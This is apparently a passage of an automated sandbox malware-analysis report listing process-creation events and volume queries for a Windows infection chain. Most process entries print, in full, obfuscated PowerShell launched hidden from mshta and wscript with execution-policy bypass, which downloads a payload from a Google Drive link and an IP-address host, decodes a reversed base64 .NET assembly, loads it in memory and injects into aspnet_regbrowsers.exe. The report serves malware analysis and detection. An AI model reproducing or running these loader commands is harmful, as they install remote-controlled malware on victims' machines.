ZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jdvnz0u5niagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagywrelvrzueugicagicagicagicagicagicagicagicagicagicagic1trw1irxjeruzjbmlusu9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjsbu9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbxunqsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb3d3osc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbjrxdqwu8sdwludcagicagicagicagicagicagicagicagicagicagicagcvn5chzwzixjbnrqdhigicagicagicagicagicagicagicagicagicagicagig9vugdpwgnpayk7jyagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicjyiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfdrsagicagicagicagicagicagicagicagicagicagicagewnremruwnd6zcagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdvnz0u5njo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtm1lje2ni82mdavc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbnn0b2vizs50suyilcikzu52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmildasmck7c1rbunqtc0xlrvaomyk7c1rbcnqgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmi'+[char]34+'))')))"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icggkcgnahl4aw1hz2vvcmwgpsbrtgvodhrwczovl2ryaxzllmdvbycrj2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1cibrtgu7ahl4d2viq2xpzw50id0gtmv3lu9ijysnamvjdcankydtexn0zscrj20utmv0lldlyknsawunkyduddtoexhpbwfnzuj5dgvzid0gahl4d2viq2xpzw50lkrvdycrj25sb2fkrccrj2f0yshoexhpbwfnzvvybck7ahl4aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoahl4aw1hz2vcexrlcyk7ahl4c3rhcnrgbgfnid0guuxlpdxcqvnfnicrjzrfu1rbulq+plfmzttoexhlbmrgbgfnid0guuxlpdxcqvnfnjrfru5epj5rtgu7ahl4c3rhcnrjbmrleca9igh5egltjysnywdlvgv4dc5jbmrlee9mkgh5ehn0yxj0rmxhzyk7ahl4zw5ksw5kzxggpsboexhpbwfnzvrlehqusw5kzxhpzihoexhlbmrgbgfnkttoexhzdgfydeluzgv4ic1nzsawic1hbmqgahl4zw5ksw5kzxgglwd0igh5ehn0yxj0sw5kzxg7ahl4c3rhcnrjbmrlecarpsboexhzdgfydezsywcutgvuz3roo2h5egjhc2u2nexlbmd0aca9igh5egvuzeknkyduzgv4ic0gahl4c3rhcnrjbmrledtoexhijysnyxnlnjrdb21tyw5kid0gahl4aw1hz2vuzxh0lln1ynn0cmluzyhoexhzdgfydeluzgv4lcboexhiyxnlnjrmzw5ndggpo2h5egjhc2u2nfjldmvyc2vkid0glwpvaw4gkgh5egjhjysnc2u2nenvbw1hbmquvg9dagenkydyqxjyyxkoksbwsjkgrm9yrwfjac1pymply3qgeyboexhfih0pwy0xjysnli4tkgh5egjhc2u2nenvbw1hbmqutgvuz3rokv07ahl4y29tbwfuzej5dccrj2vzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhoexhiyxnlnjrszxzlcnnlzck7ahl4bg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhknkyddojpmb2fkkccrj2h5egnvbw1hbmrcexrljysncyk7ahl4dmfptwv0ag9kid0gw2qnkydubglilklplkhvbwvdlkdlde1ldggnkydvzchrtgvwqulrtgupo2h5ehzhau1ldghvzc5jbnzva2uoahl4bnvsbcwgqchrtgv0ehquruvdrljflzawni82njeuntmxlju0mi4ynzevlzpwdhrouuxllcbrtgvkzxnhdgl2ywrvuuxllcbrtgvkzxnhdgl2ywqnkydvuuxljysnlcbrtgvkzxnhdgl2ywrvuuxllcbrtgvhc3ankyduzxrfcmvnynjvd3nlcnnrtgusiffmzwrlc2f0axzhzg9rtgusiffmzwrlc2f0axzhzg9rtgusuuxlzgvzyxrpdmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmzwrljysnc2f0jysnaxzhzg9rtgusuuxlzgvzyxrpjysndmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmztfrtgusuuxlzgvzyxrpdmfkb1fmzskpoycplwnyrxbmqunficaow2noqxjdmta0k1tjaefyxteymstby2hbcl0xmjaplftjaefyxtm2icatckvqtgfdzshby2hbcl04mstby2hbcl03nitby2hbcl0xmdeplftjaefyxtm5ic1yrvbmyunlj1zkoscsw2noqxjdmti0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('hyximageurl = qlehttps://drive.goo'+'gle.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur qle;hyxwebclient = new-ob'+'ject '+'syste'+'m.net.webclie'+'nt;hyximagebytes = hyxwebclient.dow'+'nloadd'+'ata(hyximageurl);hyximagetext = [system.text.encoding]::utf8.getstring(hyximagebytes);hyxstartflag = qle<<base6'+'4_start>>qle;hyxendflag = qle<<base64_end>>qle;hyxstartindex = hyxim'+'agetext.indexof(hyxstartflag);hyxendindex = hyximagetext.indexof(hyxendflag);hyxstartindex -ge 0 -and hyxendindex -gt hyxstartindex;hyxstartindex += hyxstartflag.length;hyxbase64length = hyxendi'+'ndex - hyxstartindex;hyxb'+'ase64command = hyximagetext.substring(hyxstartindex, hyxbase64length);hyxbase64reversed = -join (hyxba'+'se64command.tocha'+'rarray() vj9 foreach-object { hyx_ })[-1'+'..-(hyxbase64command.length)];hyxcommandbyt'+'es = [system.convert]::frombase64string(hyxbase64reversed);hyxloadedassembly = [system.reflection.assembly'+']::load('+'hyxcommandbyte'+'s);hyxvaimethod = [d'+'nlib.io.home].getmeth'+'od(qlevaiqle);hyxvaimethod.invoke(hyxnull, @(qletxt.eecfre/006/661.531.542.271//:ptthqle, qledesativadoqle, qledesativad'+'oqle'+', qledesativadoqle, qleasp'+'net_regbrowsersqle, qledesativadoqle, qledesativadoqle,qledesativadoqle,qledesativadoqle,qlede'+'sat'+'ivadoqle,qledesati'+'vadoqle,qledesativadoqle,qle1qle,qledesativadoqle));')-creplace ([char]104+[char]121+[char]120),[char]36 -replace([char]81+[char]76+[char]101),[char]39 -replace'vj9',[char]124))"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jdvnz0u5niagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagywrelvrzueugicagicagicagicagicagicagicagicagicagicagic1trw1irxjeruzjbmlusu9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjsbu9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbxunqsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb3d3osc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbjrxdqwu8sdwludcagicagicagicagicagicagicagicagicagicagicagcvn5chzwzixjbnrqdhigicagicagicagicagicagicagicagicagicagicagig9vugdpwgnpayk7jyagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicjyiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfdrsagicagicagicagicagicagicagicagicagicagicagewnremruwnd6zcagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdvnz0u5njo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtm1lje2ni82mdavc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbnn0b2vizs50suyilcikzu52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmildasmck7c1rbunqtc0xlrvaomyk7c1rbcnqgicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0aglnbi52ylmi'+[char]34+'))')))"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icggkcgnahl4aw1hz2vvcmwgpsbrtgvodhrwczovl2ryaxzllmdvbycrj2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1cibrtgu7ahl4d2viq2xpzw50id0gtmv3lu9ijysnamvjdcankydtexn0zscrj20utmv0lldlyknsawunkyduddtoexhpbwfnzuj5dgvzid0gahl4d2viq2xpzw50lkrvdycrj25sb2fkrccrj2f0yshoexhpbwfnzvvybck7ahl4aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoahl4aw1hz2vcexrlcyk7ahl4c3rhcnrgbgfnid0guuxlpdxcqvnfnicrjzrfu1rbulq+plfmzttoexhlbmrgbgfnid0guuxlpdxcqvnfnjrfru5epj5rtgu7ahl4c3rhcnrjbmrleca9igh5egltjysnywdlvgv4dc5jbmrlee9mkgh5ehn0yxj0rmxhzyk7ahl4zw5ksw5kzxggpsboexhpbwfnzvrlehqusw5kzxhpzihoexhlbmrgbgfnkttoexhzdgfydeluzgv4ic1nzsawic1hbmqgahl4zw5ksw5kzxgglwd0igh5ehn0yxj0sw5kzxg7ahl4c3rhcnrjbmrlecarpsboexhzdgfydezsywcutgvuz3roo2h5egjhc2u2nexlbmd0aca9igh5egvuzeknkyduzgv4ic0gahl4c3rhcnrjbmrledtoexhijysnyxnlnjrdb21tyw5kid0gahl4aw1hz2vuzxh0lln1ynn0cmluzyhoexhzdgfydeluzgv4lcboexhiyxnlnjrmzw5ndggpo2h5egjhc2u2nfjldmvyc2vkid0glwpvaw4gkgh5egjhjysnc2u2nenvbw1hbmquvg9dagenkydyqxjyyxkoksbwsjkgrm9yrwfjac1pymply3qgeyboexhfih0pwy0xjysnli4tkgh5egjhc2u2nenvbw1hbmqutgvuz3rokv07ahl4y29tbwfuzej5dccrj2vzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhoexhiyxnlnjrszxzlcnnlzck7ahl4bg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhknkyddojpmb2fkkccrj2h5egnvbw1hbmrcexrljysncyk7ahl4dmfptwv0ag9kid0gw2qnkydubglilklplkhvbwvdlkdlde1ldggnkydvzchrtgvwqulrtgupo2h5ehzhau1ldghvzc5jbnzva2uoahl4bnvsbcwgqchrtgv0ehquruvdrljflzawni82njeuntmxlju0mi4ynzevlzpwdhrouuxllcbrtgvkzxnhdgl2ywrvuuxllcbrtgvkzxnhdgl2ywqnkydvuuxljysnlcbrtgvkzxnhdgl2ywrvuuxllcbrtgvhc3ankyduzxrfcmvnynjvd3nlcnnrtgusiffmzwrlc2f0axzhzg9rtgusiffmzwrlc2f0axzhzg9rtgusuuxlzgvzyxrpdmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmzwrljysnc2f0jysnaxzhzg9rtgusuuxlzgvzyxrpjysndmfkb1fmzsxrtgvkzxnhdgl2ywrvuuxllffmztfrtgusuuxlzgvzyxrpdmfkb1fmzskpoycplwnyrxbmqunficaow2noqxjdmta0k1tjaefyxteymstby2hbcl0xmjaplftjaefyxtm2icatckvqtgfdzshby2hbcl04mstby2hbcl03nitby2hbcl0xmdeplftjaefyxtm5ic1yrvbmyunlj1zkoscsw2noqxjdmti0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('hyximageurl = qlehttps://drive.goo'+'gle.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur qle;hyxwebclient = new-ob'+'ject '+'syste'+'m.net.webclie'+'nt;hyximagebytes = hyxwebclient.dow'+'nloadd'+'ata(hyximageurl);hyximagetext = [system.text.encoding]::utf8.getstring(hyximagebytes);hyxstartflag = qle<<base6'+'4_start>>qle;hyxendflag = qle<<base64_end>>qle;hyxstartindex = hyxim'+'agetext.indexof(hyxstartflag);hyxendindex = hyximagetext.indexof(hyxendflag);hyxstartindex -ge 0 -and hyxendindex -gt hyxstartindex;hyxstartindex += hyxstartflag.length;hyxbase64length = hyxendi'+'ndex - hyxstartindex;hyxb'+'ase64command = hyximagetext.substring(hyxstartindex, hyxbase64length);hyxbase64reversed = -join (hyxba'+'se64command.tocha'+'rarray() vj9 foreach-object { hyx_ })[-1'+'..-(hyxbase64command.length)];hyxcommandbyt'+'es = [system.convert]::frombase64string(hyxbase64reversed);hyxloadedassembly = [system.reflection.assembly'+']::load('+'hyxcommandbyte'+'s);hyxvaimethod = [d'+'nlib.io.home].getmeth'+'od(qlevaiqle);hyxvaimethod.invoke(hyxnull, @(qletxt.eecfre/006/661.531.542.271//:ptthqle, qledesativadoqle, qledesativad'+'oqle'+', qledesativadoqle, qleasp'+'net_regbrowsersqle, qledesativadoqle, qledesativadoqle,qledesativadoqle,qledesativadoqle,qlede'+'sat'+'ivadoqle,qledesati'+'vadoqle,qledesativadoqle,qle1qle,qledesativadoqle));')-creplace ([char]104+[char]121+[char]120),[char]36 -replace([char]81+[char]76+[char]101),[char]39 -replace'vj9',[char]124))"Jump to behavior
              Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1751632000.0000000004460000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
              Source: explorer.exe, 0000000E.00000002.2535055415.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
              Source: explorer.exe, 0000000E.00000002.2537457243.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748963953.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_029C55EB cpuid 19_2_029C55EB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
